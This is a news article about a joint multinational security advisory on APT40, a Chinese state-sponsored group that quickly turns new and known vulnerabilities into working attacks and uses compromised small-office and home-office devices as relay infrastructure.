China’s APT40 targets new vulnerabilities and can exploit them within hours
Chinese state-sponsored threat actors, tracked by Western cybersecurity agencies as APT40, are moving fast. They hunt for previously undisclosed vulnerabilities, rapidly build exploits, and rush to deploy them as soon as possible.
In some cases, the entire process from discovering the vulnerability to exploiting it took just a few hours.
This is evident from new security advice published jointly by the national security services of Australia, the US, Canada, New Zealand, Japan, South Korea, the UK and Germany.
Targeted at SOHO equipment
Two years ago, Australia’s Cyber Security Centre (ASCS) was called by a local company to assist with a cyberattack. With the victim’s permission, the agency “deployed host-based sensors to likely compromised hosts on the organization’s network” to monitor and map the attacker’s activities.
The advisory is the result of that analysis and states that APT40 “has the capability to rapidly transform and adapt proof-of-concept(s) (POCs) of new vulnerabilities and immediately deploy them against target networks that have the associated vulnerability infrastructure.”
In addition to looking for new bugs, the group also scours the Internet for known vulnerabilities that have not yet been patched and thus provide an easy gateway into the target infrastructure.
“This regular reconnaissance allows the group to identify vulnerable, end-of-life, or no longer serviceable devices on networks of interest and quickly deploy exploits,” the agencies said. They scan for devices that are still vulnerable to Log4shell, Atlassian Confluence flaws, and known Microsoft Exchange vulnerabilities.
“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors for its operations in Australia,” the researchers added. “Many of these SOHO devices are end-of-life or unpatched, posing soft targets for N-day exploitation.”
However, attacking SOHO devices is a double-edged sword, as it also gives security services the opportunity to track and analyze the attackers, helping to set up defenses.
Through The register